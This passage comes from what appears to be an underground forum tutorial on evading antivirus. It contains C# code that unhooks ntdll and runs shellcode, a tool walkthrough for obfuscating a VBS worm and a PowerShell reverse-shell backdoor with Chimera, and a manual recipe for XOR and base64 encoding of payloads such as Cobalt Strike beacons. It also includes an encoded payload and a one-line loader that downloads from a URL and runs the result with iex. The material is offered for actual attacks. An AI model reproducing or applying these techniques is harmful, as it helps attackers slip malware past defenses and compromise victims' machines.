UserApc = 0x000000c0,
KernelApc = 0x00000100,
Alerted = 0x00000101,
Timeout = 0x00000102,
Pending = 0x00000103,
Reparse = 0x00000104,
MoreEntries = 0x00000105,
NotAllAssigned = 0x00000106,
SomeNotMapped = 0x00000107,
OpLockBreakInProgress = 0x00000108,
VolumeMounted = 0x00000109,
RxActCommitted = 0x0000010a,
NotifyCleanup = 0x0000010b,
NotifyEnumDir = 0x0000010c,
NoQuotasForAccount = 0x0000010d,
PrimaryTransportConnectFailed = 0x0000010e,
PageFaultTransition = 0x00000110,
PageFaultDemandZero = 0x00000111,
PageFaultCopyOnWrite = 0x00000112,
PageFaultGuardPage = 0x00000113,
PageFaultPagingFile = 0x00000114,
CrashDump = 0x00000116,
ReparseObject = 0x00000118,
NothingToTerminate = 0x00000122,
ProcessNotInJob = 0x00000123,
ProcessInJob = 0x00000124,
ProcessCloned = 0x00000129,
FileLockedWithOnlyReaders = 0x0000012a,
FileLockedWithWriters = 0x0000012b,
// Informational
Informational = 0x40000000,
ObjectNameExists = 0x40000000,
ThreadWasSuspended = 0x40000001,
WorkingSetLimitRange = 0x40000002,
ImageNotAtBase = 0x40000003,
RegistryRecovered = 0x40000009,
// Warning
Warning = 0x80000000,
GuardPageViolation = 0x80000001,
DatatypeMisalignment = 0x80000002,
Breakpoint = 0x80000003,
SingleStep = 0x80000004,
BufferOverflow = 0x80000005,
NoMoreFiles = 0x80000006,
HandlesClosed = 0x8000000a,
PartialCopy = 0x8000000d,
DeviceBusy = 0x80000011,
InvalidEaName = 0x80000013,
EaListInconsistent = 0x80000014,
NoMoreEntries = 0x8000001a,
LongJump = 0x80000026,
DllMightBeInsecure = 0x8000002b,
// Error
Error = 0xc0000000,
Unsuccessful = 0xc0000001,
NotImplemented = 0xc0000002,
InvalidInfoClass = 0xc0000003,
InfoLengthMismatch = 0xc0000004,
AccessViolation = 0xc0000005,
InPageError = 0xc0000006,
PagefileQuota = 0xc0000007,
InvalRunPEdle = 0xc0000008,
BadInitialStack = 0xc0000009,
BadInitialPc = 0xc000000a,
InvalidCid = 0xc000000b,
TimerNotCanceled = 0xc000000c,
InvalidParameter = 0xc000000d,
NoSuchDevice = 0xc000000e,
NoSuchFile = 0xc000000f,
InvalidDeviceRequest = 0xc0000010,
EndOfFile = 0xc0000011,
WrongVolume = 0xc0000012,
NoMediaInDevice = 0xc0000013,
NoMemory = 0xc0000017,
ConflictingAddresses = 0xc0000018,
NotMappedView = 0xc0000019,
UnableToFreeVm = 0xc000001a,
UnableToDeleteSection = 0xc000001b,
IllegalInstruction = 0xc000001d,
AlreadyCommitted = 0xc0000021,
AccessDenied = 0xc0000022,
BufferTooSmall = 0xc0000023,
ObjectTypeMismatch = 0xc0000024,
NonContinuableException = 0xc0000025,
BadStack = 0xc0000028,
NotLocked = 0xc000002a,
NotCommitted = 0xc000002d,
InvalidParameterMix = 0xc0000030,
ObjectNameInvalid = 0xc0000033,
ObjectNameNotFound = 0xc0000034,
ObjectNameCollision = 0xc0000035,
ObjectPathInvalid = 0xc0000039,
ObjectPathNotFound = 0xc000003a,
ObjectPathSyntaxBad = 0xc000003b,
DataOverrun = 0xc000003c,
DataLate = 0xc000003d,
DataError = 0xc000003e,
CrcError = 0xc000003f,
SectionTooBig = 0xc0000040,
PortConnectionRefused = 0xc0000041,
InvalidPortHandle = 0xc0000042,
SharingViolation = 0xc0000043,
QuotaExceeded = 0xc0000044,
InvalidPageProtection = 0xc0000045,
MutantNotOwned = 0xc0000046,
SemaphoreLimitExceeded = 0xc0000047,
PortAlreadySet = 0xc0000048,
SectionNotImage = 0xc0000049,
SuspendCountExceeded = 0xc000004a,
ThreadIsTerminating = 0xc000004b,
BadWorkingSetLimit = 0xc000004c,
IncompatibleFileMap = 0xc000004d,
SectionProtection = 0xc000004e,
EasNotSupported = 0xc000004f,
EaTooLarge = 0xc0000050,
NonExistentEaEntry = 0xc0000051,
NoEasOnFile = 0xc0000052,
EaCorruptError = 0xc0000053,
FileLockConflict = 0xc0000054,
LockNotGranted = 0xc0000055,
DeletePending = 0xc0000056,
CtlFileNotSupported = 0xc0000057,
UnknownRevision = 0xc0000058,
RevisionMismatch = 0xc0000059,
InvalidOwner = 0xc000005a,
InvalidPrimaryGroup = 0xc000005b,
NoImpersonationToken = 0xc000005c,
CantDisableMandatory = 0xc000005d,
NoLogonServers = 0xc000005e,
NoSuchLogonSession = 0xc000005f,
NoSuchPrivilege = 0xc0000060,
PrivilegeNotHeld = 0xc0000061,
InvalidAccountName = 0xc0000062,
UserExists = 0xc0000063,
NoSuchUser = 0xc0000064,
GroupExists = 0xc0000065,
NoSuchGroup = 0xc0000066,
MemberInGroup = 0xc0000067,
MemberNotInGroup = 0xc0000068,
LastAdmin = 0xc0000069,
WrongPassword = 0xc000006a,
IllFormedPassword = 0xc000006b,
PasswordRestriction = 0xc000006c,
LogonFailure = 0xc000006d,
AccountRestriction = 0xc000006e,
InvalidLogonHours = 0xc000006f,
InvalidWorkstation = 0xc0000070,
PasswordExpired = 0xc0000071,
AccountDisabled = 0xc0000072,
NoneMapped = 0xc0000073,
TooManyLuidsRequested = 0xc0000074,
LuidsExhausted = 0xc0000075,
InvalidSubAuthority = 0xc0000076,
InvalidAcl = 0xc0000077,
InvalidSid = 0xc0000078,
InvalidSecurityDescr = 0xc0000079,
ProcedureNotFound = 0xc000007a,
InvalidImageFormat = 0xc000007b,
NoToken = 0xc000007c,
BadInheritanceAcl = 0xc000007d,
RangeNotLocked = 0xc000007e,
DiskFull = 0xc000007f,
ServerDisabled = 0xc0000080,
ServerNotDisabled = 0xc0000081,
TooManyGuidsRequested = 0xc0000082,
GuidsExhausted = 0xc0000083,
InvalidIdAuthority = 0xc0000084,
AgentsExhausted = 0xc0000085,
InvalidVolumeLabel = 0xc0000086,
SectionNotExtended = 0xc0000087,
NotMappedData = 0xc0000088,
ResourceDataNotFound = 0xc0000089,
ResourceTypeNotFound = 0xc000008a,
ResourceNameNotFound = 0xc000008b,
ArrayBoundsExceeded = 0xc000008c,
FloatDenormalOperand = 0xc000008d,
FloatDivideByZero = 0xc000008e,
FloatInexactResult = 0xc000008f,
FloatInvalidOperation = 0xc0000090,
FloatOverflow = 0xc0000091,
FloatStackCheck = 0xc0000092,
FloatUnderflow = 0xc0000093,
IntegerDivideByZero = 0xc0000094,
IntegerOverflow = 0xc0000095,
PrivilegedInstruction = 0xc0000096,
TooManyPagingFiles = 0xc0000097,
FileInvalid = 0xc0000098,
InsufficientResources = 0xc000009a,
InstanceNotAvailable = 0xc00000ab,
PipeNotAvailable = 0xc00000ac,
InvalidPipeState = 0xc00000ad,
PipeBusy = 0xc00000ae,
IllegalFunction = 0xc00000af,
PipeDisconnected = 0xc00000b0,
PipeClosing = 0xc00000b1,
PipeConnected = 0xc00000b2,
PipeListening = 0xc00000b3,
InvalidReadMode = 0xc00000b4,
IoTimeout = 0xc00000b5,
FileForcedClosed = 0xc00000b6,
ProfilingNotStarted = 0xc00000b7,
ProfilingNotStopped = 0xc00000b8,
NotSameDevice = 0xc00000d4,
FileRenamed = 0xc00000d5,
CantWait = 0xc00000d8,
PipeEmpty = 0xc00000d9,
CantTerminateSelf = 0xc00000db,
InternalError = 0xc00000e5,
InvalidParameter1 = 0xc00000ef,
InvalidParameter2 = 0xc00000f0,
InvalidParameter3 = 0xc00000f1,
InvalidParameter4 = 0xc00000f2,
InvalidParameter5 = 0xc00000f3,
InvalidParameter6 = 0xc00000f4,
InvalidParameter7 = 0xc00000f5,
InvalidParameter8 = 0xc00000f6,
InvalidParameter9 = 0xc00000f7,
InvalidParameter10 = 0xc00000f8,
InvalidParameter11 = 0xc00000f9,
InvalidParameter12 = 0xc00000fa,
ProcessIsTerminating = 0xc000010a,
MappedFileSizeZero = 0xc000011e,
TooManyOpenedFiles = 0xc000011f,
Cancelled = 0xc0000120,
CannotDelete = 0xc0000121,
InvalidComputerName = 0xc0000122,
FileDeleted = 0xc0000123,
SpecialAccount = 0xc0000124,
SpecialGroup = 0xc0000125,
SpecialUser = 0xc0000126,
MembersPrimaryGroup = 0xc0000127,
FileClosed = 0xc0000128,
TooManyThreads = 0xc0000129,
ThreadNotInProcess = 0xc000012a,
TokenAlreadyInUse = 0xc000012b,
PagefileQuotaExceeded = 0xc000012c,
CommitmentLimit = 0xc000012d,
InvalidImageLeFormat = 0xc000012e,
InvalidImageNotMz = 0xc000012f,
InvalidImageProtect = 0xc0000130,
InvalidImageWin16 = 0xc0000131,
LogonServer = 0xc0000132,
DifferenceAtDc = 0xc0000133,
SynchronizationRequired = 0xc0000134,
DllNotFound = 0xc0000135,
IoPrivilegeFailed = 0xc0000137,
OrdinalNotFound = 0xc0000138,
EntryPointNotFound = 0xc0000139,
ControlCExit = 0xc000013a,
InvalidAddress = 0xc0000141,
PortNotSet = 0xc0000353,
DebuggerInactive = 0xc0000354,
CallbackBypass = 0xc0000503,
PortClosed = 0xc0000700,
MessageLost = 0xc0000701,
InvalidMessage = 0xc0000702,
RequestCanceled = 0xc0000703,
RecursiveDispatch = 0xc0000704,
LpcReceiveBufferExpected = 0xc0000705,
LpcInvalidConnectionUsage = 0xc0000706,
LpcRequestsNotAllowed = 0xc0000707,
ResourceInUse = 0xc0000708,
ProcessIsProtected = 0xc0000712,
VolumeDirty = 0xc0000806,
FileCheckedOut = 0xc0000901,
CheckOutRequired = 0xc0000902,
BadFileType = 0xc0000903,
FileTooLarge = 0xc0000904,
FormsAuthRequired = 0xc0000905,
VirusInfected = 0xc0000906,
VirusDeleted = 0xc0000907,
TransactionalConflict = 0xc0190001,
InvalidTransaction = 0xc0190002,
TransactionNotActive = 0xc0190003,
TmInitializationFailed = 0xc0190004,
RmNotActive = 0xc0190005,
RmMetadataCorrupt = 0xc0190006,
TransactionNotJoined = 0xc0190007,
DirectoryNotRm = 0xc0190008,
CouldNotResizeLog = 0xc0190009,
TransactionsUnsupportedRemote = 0xc019000a,
LogResizeInvalidSize = 0xc019000b,
RemoteFileVersionMismatch = 0xc019000c,
CrmProtocolAlreadyExists = 0xc019000f,
TransactionPropagationFailed = 0xc0190010,
CrmProtocolNotFound = 0xc0190011,
TransactionSuperiorExists = 0xc0190012,
TransactionRequestNotValid = 0xc0190013,
TransactionNotRequested = 0xc0190014,
TransactionAlreadyAborted = 0xc0190015,
TransactionAlreadyCommitted = 0xc0190016,
TransactionInvalidMarshallBuffer = 0xc0190017,
CurrentTransactionNotValid = 0xc0190018,
LogGrowthFailed = 0xc0190019,
ObjectNoLongerExists = 0xc0190021,
StreamMiniversionNotFound = 0xc0190022,
StreamMiniversionNotValid = 0xc0190023,
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
CantOpenMiniversionWithModifyIntent = 0xc0190025,
CantCreateMoreStreamMiniversions = 0xc0190026,
HandleNoLongerValid = 0xc0190028,
NoTxfMetadata = 0xc0190029,
LogCorruptionDetected = 0xc0190030,
CantRecoverWithHandleOpen = 0xc0190031,
RmDisconnected = 0xc0190032,
EnlistmentNotSuperior = 0xc0190033,
RecoveryNotNeeded = 0xc0190034,
RmAlreadyStarted = 0xc0190035,
FileIdentityNotPersistent = 0xc0190036,
CantBreakTransactionalDependency = 0xc0190037,
CantCrossRmBoundary = 0xc0190038,
TxfDirNotEmpty = 0xc0190039,
IndoubtTransactionsExist = 0xc019003a,
TmVolatile = 0xc019003b,
RollbackTimerExpired = 0xc019003c,
TxfAttributeCorrupt = 0xc019003d,
EfsNotAllowedInTransaction = 0xc019003e,
TransactionalOpenNotAllowed = 0xc019003f,
TransactedMappingUnsupportedRemote = 0xc0190040,
TxfMetadataAlreadyPresent = 0xc0190041,
TransactionScopeCallbacksNotSet = 0xc0190042,
TransactionRequiredPromotion = 0xc0190043,
CannotExecuteFileInTransaction = 0xc0190044,
TransactionsNotFrozen = 0xc0190045,
MaximumNtStatus = 0xffffffff
}
[Flags]
public enum AllocationType : ulong
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
};
[DllImport("psapi.dll", SetLastError = true)]
static extern bool GetModuleInformation(IntPtr hProcess, IntPtr hModule, out MODULEINFO lpmodinfo, uint cb);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateFileA(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern IntPtr CreateFileMapping(IntPtr hFile, IntPtr lpFileMappingAttributes, FileMapProtection flProtect, uint dwMaximumSizeHigh, uint dwMaximumSizeLow, [MarshalAs(UnmanagedType.LPStr)] string lpName);
[DllImport("kernel32.dll")]
static extern IntPtr MapViewOfFile(IntPtr hFileMappingObject, FileMapAccess dwDesiredAccess, UInt32 dwFileOffsetHigh, UInt32 dwFileOffsetLow, IntPtr dwNumberOfBytesToMap);
[DllImport("kernel32.dll")]
static extern int VirtualProtect(IntPtr lpAddress, UInt32 dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
public static extern IntPtr memcpy(IntPtr dest, IntPtr src, UInt32 count);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool FreeLibrary(IntPtr hModule);
[DllImport("ntdll.dll", SetLastError = true)]
static extern NTSTATUS NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect);
[DllImport("ntdll.dll", SetLastError = true)]
static extern NTSTATUS NtCreateThreadEx(out IntPtr threadHandle, ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList);
[DllImport("ntdll.dll", SetLastError = true)]
static extern NTSTATUS NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection);
static void Main()
{
byte[] ShellcodeBytes = new byte[] { }; // you shellcode here
IntPtr curProc = GetCurrentProcess();
MODULEINFO modInfo;
IntPtr handle = GetModuleHandle("ntdll.dll");
GetModuleInformation(curProc, handle, out modInfo, 0x18);
IntPtr dllBase = modInfo.lpBaseOfDll;
string fileName = "C:\\Windows\\System32\\ntdll.dll";
IntPtr file = CreateFileA(fileName, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);
IntPtr mapping = CreateFileMapping(file, IntPtr.Zero, FileMapProtection.PageReadonly | FileMapProtection.SectionImage, 0, 0, null);
IntPtr mappedFile = MapViewOfFile(mapping, FileMapAccess.FileMapRead, 0, 0, IntPtr.Zero);
IMAGE_DOS_HEADER dosHeader = (IMAGE_DOS_HEADER)Marshal.PtrToStructure(dllBase, typeof(IMAGE_DOS_HEADER));
IntPtr ptrToNt = (dllBase + dosHeader.e_lfanew);
IMAGE_NT_HEADERS64 ntHeaders = (IMAGE_NT_HEADERS64)Marshal.PtrToStructure(ptrToNt, typeof(IMAGE_NT_HEADERS64));
for (int i = 0; i < ntHeaders.FileHeader.NumberOfSections; i++)
{
IntPtr ptrSectionHeader = (ptrToNt + Marshal.SizeOf(typeof(IMAGE_NT_HEADERS64)));
IMAGE_SECTION_HEADER sectionHeader = (IMAGE_SECTION_HEADER)Marshal.PtrToStructure((ptrSectionHeader + (i * Marshal.SizeOf(typeof(IMAGE_SECTION_HEADER)))), typeof(IMAGE_SECTION_HEADER));
string sectionName = new string(sectionHeader.Name);
if (sectionName.Contains("text"))
{
uint oldProtect = 0;
IntPtr lpAddress = IntPtr.Add(dllBase, (int)sectionHeader.VirtualAddress);
IntPtr srcAddress = IntPtr.Add(mappedFile, (int)sectionHeader.VirtualAddress);
int vProtect = VirtualProtect(lpAddress, sectionHeader.VirtualSize, 0x40, out oldProtect);
memcpy(lpAddress, srcAddress, sectionHeader.VirtualSize);
vProtect = VirtualProtect(lpAddress, sectionHeader.VirtualSize, oldProtect, out oldProtect);
}
}
Console.Read();
CloseHandle(curProc);
CloseHandle(file);
CloseHandle(mapping);
FreeLibrary(handle);
IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
IntPtr AllocationAddress = new IntPtr();
IntPtr ZeroBitsThatZero = IntPtr.Zero;
UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
Console.WriteLine("[*] Allocating memory...");
NtAllocateVirtualMemory(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
Console.WriteLine("[*] Copying Shellcode...");
Marshal.Copy(ShellcodeBytes, 0, AllocationAddress, ShellcodeBytes.Length);
Console.WriteLine("[*] Changing memory protection setting...");
UInt32 newProtect = 0;
NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x20, ref newProtect);
IntPtr threadHandle = new IntPtr(0);
ACCESS_MASK desiredAccess = ACCESS_MASK.SPECIFIC_RIGHTS_ALL | ACCESS_MASK.STANDARD_RIGHTS_ALL; // logical OR the access rights together
IntPtr pObjectAttributes = new IntPtr(0);
IntPtr lpParameter = new IntPtr(0);
bool bCreateSuspended = false;
int stackZeroBits = 0;
int sizeOfStackCommit = 0xFFFF;
int sizeOfStackReserve = 0xFFFF;
IntPtr pBytesBuffer = new IntPtr(0);
// create new thread
Console.WriteLine("[*] Creating new thread to execute the Shellcode...");
NtCreateThreadEx(out threadHandle, desiredAccess, pObjectAttributes, ProcessHandle, AllocationAddress, lpParameter, bCreateSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, pBytesBuffer);
Console.WriteLine("[+] Thread created with handle {0}! Sh3llc0d3 executed!", threadHandle.ToString("X4"));
}
}
}run it, and enjoy your clean.
That was easy. Now let's move to what much more easier, Signature detection
Signature Detection:
Simple without making it complicated, Signature detection depends on some values on the malware for example the offset of a specific function in the code or functions or even a variable name. All in all, it is a static detection, it means it detect based in some values on the malware, and we can know this kind of detection when a file touches the hard disk of the machine, if the antivirus give an alarm that means that the file has some values that the antivirus flagged as dangerous.
Bypassing Signature (Static) detection:
This kind of detection can be bypassed with many ways like changing these flagged values with hex (I don't like this technique) or by loading the malware in the memory and that's the best way to bypass the static detection and to make it much more harder for the antivirus we can encrypt the malware with one of the encryption algorithms like aes, des, xor ..etc.
Encrypting or Obfuscating malwares that have been written in scripting languages like vbs, powershell, and many more like php, perl, python is pretty simple cause these scripting languages have functions that help us execute a scripting code while the main script is running which is like running a binary or shellcode in memory in languages like c,c++,c# or any other language that support such activity, so to bypass such detection all what we need to do is to make the malware code is malformed so the antivirus can understand it while it is in the desk after that de-obfuscate it and run it in run time. Here are some examples of such functions:
Eval -> php,perl
Execute -> vbs
Iex -> powershell ..etc
If you have a specific language you can google it to find what function supports execute codes in run time
Obfuscate vbs scripts:
I think many of you will like this part because all of us use vbs scripts in ms office macro attacks like word excel.
For those who don't know anything thing of this kind of attacks, check the following url https://www.wolfandco.com/resources/insights/anatomy-of-an-office-macro-attack/
As I mentioned in the Signature detection we need to obfuscate the content of the script and make it ambiguous for the antivirus. I have create a simple python code that does the whole work for us and it's a gift for XSS.IS members and especially for the admin and the sponsor , you can find the tool in the attachments. The tool supports obfuscating using five techniques
[*] Octal
[*] ShortOctal
[*] Hex
[*] Letters
[*] Chars
Execute the following command
python vbs_obfuscator.py –h
As an example I will encrypt a vbs worm, I think some of you are familiar with. Let's see the result before and after the obfuscating.
Now let's execute the following command:
vbs_obfuscator.py -f worm.vbs -t octal -nl -o encrypted_worm.vbs
Now let's scan the output
clean, not detection found by any antivirus.
Let's explain the command args of the tool that I created.
-f : the malware to be obfuscated
-t : the technique to use to obfuscate the malware, use can use -l to get the list of the technique available in the tool
-o : the output file name.
-nl: create new lines (\n) after eache line. If you are going to use this arg, the file size will be increased.
Now let's see how does the output file looks like:
As the figure shows, the malware has been completely obfuscated compared to the original one (I have attached the original worm, so you can check and try it yourself).
By obfuscating the script code I could bypass all the static detections of the all antiviruses, the tool will produce clean version of your malware each time you run it. Now you can use this tool with attacks that depends on vbs codes like ms macro or any other attacks. Try it by yourself
Obfuscate powershell scripts:
Powershell is pentesters' favorite language, many github repos provide powershell script obfuscation, and here are some of them:
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/RythmStick/AMSITrigger
https://github.com/tokyoneon/Chimera
I will explain the Chimera
Installing the tools is pretty forward
git clone https://github.com/tokyoneon/chimera
chmod +x chimera.sh; ./chimera.sh –help
the tool comes with plenty of examples you can run the command
cat USAGE.md
and you will see many examples and their explanations. I will run the example that the author of the tool has provided with the tool because he tried the tool on Chinese's favorite backdoor and mine actually
the script is Invoke-PowerShellTcp.ps1, which will provide us with an interactive powershell shell, the result of it before scanning in virustotal.com can be found on this link
https://www.virustotal.com/gui/file/b33ee9d0667628067479d4a4f7a998ad14786ff1bf9d66db5942ae727b12426c
the file has a already scanned by thousands and it's a well known to antiviruses. So now let's encrypt it and scan the result again.
Basic usage is
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r –p
The tool will provide us with a file in the /tmp path -> /tmp/chimera.ps1
Let's scan it and see the results
https://www.virustotal.com/gui/file...7be196e7046e587c0defb6bef91a2dacfab?nocache=1
By executing an basic command, we could bypass almost all antiviruses, that's really incredible, Sophos is a stupid antivirus I could bypass it by deleting the comments from the files that the tool has provided us with, execute the following command:
sed -i "/#/d" /tmp/chimera.ps1
and scan the file again you will see that
We could kick Sophos off but another antivirus appeared. Anyway, we can increase the level of obfuscating and we can manipulate the values of the tool, I will leave that for you because it's pretty easy, all what you have to do it to read the github repo of the tool.
Obfuscating powershell script manually:
Now I will explain, how can we encrypt or obfuscate powershell manually, for those who sent me private messages asking me to explain to them how to encrypt cobalt strike beacon, you can use thise technquie to encrypt it. Before I start, I want to mention that we can use c# and vb.net codes to encrypt or obfuscate the powershell code and invoke shellcode and c# malware bytes in memory and kick AMSI and windows defender so easily, for now I will show you how we can encrypt powershell scripts with few lines and the result is wounderfall. I will use xor encryption technique with master key to encrypt powershell backdoor, encode the output with base64, then make the bs64 data malformed. Let's open powershell and execute the following commands
Bash: Скопировать в буфер обмена
Код:
[Byte[]] $bs = [System.IO.File]::ReadAllBytes("powershell_malware_path"); # you can put your cobalt strike beacon backdoor
for($i=0;$i -lt $bs.Count;$i++){$bs[$i] = $bs[$i] -bxor [B]NUM[/B]}; # change the [B]NUM[/B] to any number, master key
$bs64=[Convert]::ToBase64String($bs);
[System.IO.File]::WriteAllBytes("path_for_base64_output_file",[System.Text.Encoding]::Ascii.GetBytes($bs64.Replace("A","@").Replace("W","!").Replace("x","*").Replace("y","---")))The output result
Код: Скопировать в буфер обмена
H**MU0tZTk9U!VBQHBF6VVBZHGdIVFVPHFpVUFkcTF1IVGE2GF9QVVlSSBwBHBhSSVBQBzYYT0hO!V1RH@EcGFJJUF@HNhheSVpa!U4c@RwYUklQU@c2GEtOVUhZThwBHBhSSVBQBzYY!F1IXRwBHB4eBzYYTllPSVBIH@EcHh4HNkhORR*HNjUYX1BV!VJIH@EccllLEXNeVllfSB*---!UgSb1NfV1lIT*JoX0*/UFVZUkgUHm9ZTkpZTmN1bGN0!U5ZHh@cDQ4PCBUHNjUYT0hO!V1RH@EcGF9QVVlSSBJ7!UhvSE5ZXVEUFQc2NRheSVpa!U4c@R*---!UsRc15!!V9IHH5FSFlnYRwND@4IBzY1GFlSX1NYVVJbH@EccllLEXNeVllfSB*o!URIEn1PX1VVeVJfU1hVUlsHNjUYS05VSFlOH@EccllLEXNeVllfSB*1c*JvSE5ZXVFrTlVI!U4UGE9ITlldURUHNjUYS05VSFlOEn1JSFN6UElPVBwBHBhITklZBzY1a05VSFkRdFNPSBwefl1fV1hTU04cVU8cSUwcXVJYHE5JUlJVUlsSEhIeBzY1a05VSFkRdFNPSBweHgc2NRheRUhZT*wBH@wHNjVYU**HNjU1GEtOVUhZThJrTlVI!RQebG8CHhUHNjU1!FMcRzY1NTUYXkVI!U8c@RwYT0hO!V1REm5ZXVgUGF5J!lpZTh@cDB@cGF5J!lpZThJw!VJbSFQVBzY1NTVV!hwUGF5FSFlPHBFbSBwMFR*HNjU1NTUY!F1IXRwBHBhYXUhdHBccGFlSX1NYVVJbEntZSG9ITlVS!*QYXkla!llOEBwMEBwYXkVI!U8VBzY1NTVBNjU1QR*LVFVQ!RwUGE9ITlldURJ4XUhdfUpdVVBdXlBZFQc2NTVV!hwUGF5FSFlPHBFbSBwMFR*HNjU1NRhYXUhdH@EcGFhdSF0SaE5VURQVBzY1NTVV!hwUGFhdSF0ScFlS!0hUHBFbSBwMFR*HNjU1NTVITkUcRzY1NTU1NRhO!U9JUEgc@R*1UkpTV1kReURMTllPT1VTUhwRf1NRUV1S!BwY!F1IXRwO@hoNHE@cc0lIE!9ITlVS!wc2NTU1NUEcX11IX1QcRzY1NTU1NRhO!U9JUEgc@RwYY*J5RF9ZTEhVU1IcQB*zSUgRb0hOVVJbBzY1NTU1QTY1NTU1GFhdSF0c@RweHgc2NTU1NRhQ!VJbSFQc@RwYTllPSVBIEnBZUltIV@c2NTU1NVVaHBQYUFlS!0hUHBFbSBwMFR*HNjU1NTU1GF9TSVJIH@EcD@c2NTU1NTVYU**HNjU1NTU1NVVaHBQYUFlS!0hUHBFb!RwYXkla!llOEnBZUltIVBUcR*wYXkVI!U8c@RwYXkla!llOEnBZUltIV@ccQR*ZUE9ZHEccGF5FSFlPH@EcGFBZUltIV@ccQTY1NTU1NTUYS05VSFlOEmtOVUhZFBhO!U9JUEgST0leT0hOVVJbFBhfU0lSSB@cGF5FSFlPFRUHNjU1NTU1NRhfU0lSSBwX@RwYXkVI!U8HNjU1NTU1NRhQ!VJbSFQcEQEcGF5FSFlPBzY1NTU1NUEcS1RVUFkcFBhQ!VJbSFQcEVtIH@wVBzY1NTU1NRhO!U9JUEgc@RweHgc2NTU1NUE2NTU1QTY1NUE2NUEcS1RVUFkcFBheRUhZT*wR!0gcDBUHNjVrTlVI!RF0U09IHB5+XV9X!FNTTh*LVVBQHFJTS**ZRFVIEhISHgc2QR*fXUhfVB*HNjVrTlVI!RF0U09IHBhjEnlEX1lMSFVTUhJ1UlJZTnlEX1lMSFVTUhJ*!U9PXVtZBzZBHFpVUl1QUEUcRzY1VVocFBhLTlVI!U4cEVJZHBhSSVBQFR*HNjU1GEtOVUhZThJ/UFNP!RQVBzY1NRhLTlVI!U4SeFVPTFNP!RQVBzY1NX9Q!V1OE!pdTlVdXlBZHBF---XVFZHB5LTlVI!U4eBzY1QTY1VVocFBhPSE5ZXVEcEVJZHBhSSVBQFR*HNjU1GE9ITlldURJ/UFNP!RQVBzY1NRhPSE5ZXVESeFVPTFNP!RQVBzY1NX9Q!V1OE!pdTlVdXlBZHBF---XVFZHB5PSE5ZXVEeBzY1QTY1VVocFBhfUFVZUkgcEVJZHBhSSVBQFR*HNjU1GF9QVVlSSBJ/UFNP!RQVBzY1NRhfUFVZUkgSeFVPTFNP!RQVBzY1NX9Q!V1OE!pdTlVdXlBZHBF---XVFZHB5fUFVZUkgeBzY1QTY1VVocFBheSVpa!U4cEVJZHBhSSVBQFR*HNjU1GF5J!lpZThJ/UFldThQVBzY1NX9Q!V1OE!pdTlVdXlBZHBF---XVFZHB5eSVpa!U4eBzY1QTY1f1BZXU4Ral1OVV1eUFkcEXJdUVkcHk5ZT0lQSB4HNjV/UFldThFqXU5VXV5Q!RwRcl1R!Rwe!F1IXR4HNjVnb0VPSFlREnt/YQYGf1NQUFlfSBQVBzZBNg==As you can see the output is a random data, you can check it youself, I promise you it's CLEAN.
As I told you CLEAN, no detection has found.
Loading it into the powershell an execute it is pretty simple. All what we have to do is to reverse everything
Load -> XOR -> base64_decode -> invoke
we can load the file from url and the following code is all what we need
Bash: Скопировать в буфер обмена
$w=new-object System.Net.Webclient;$bs=$w.DownloadString("http://127.0.0.1/1/bs64.bs64");[Byte[]] $x=[Convert]::FromBase64String($bs.Replace("---","y").Replace("!","W").Replace("@","A").Replace("*","x"));for($i=0;$i -lt $x.Count;$i++){$x[$i]=$x[$i] -bxor [B]NUM[/B]};iex([System.Text.Encoding]::Ascii.GetString($x))replace http://127.0.0.1/1/bs64.bs64 with your bs64 url
replace NUM with the same number used in the encryption
and run it in powershell. You can also encode it which will make it much easy. to encode it execute the following command in powershell
Bash: Скопировать в буфер обмена
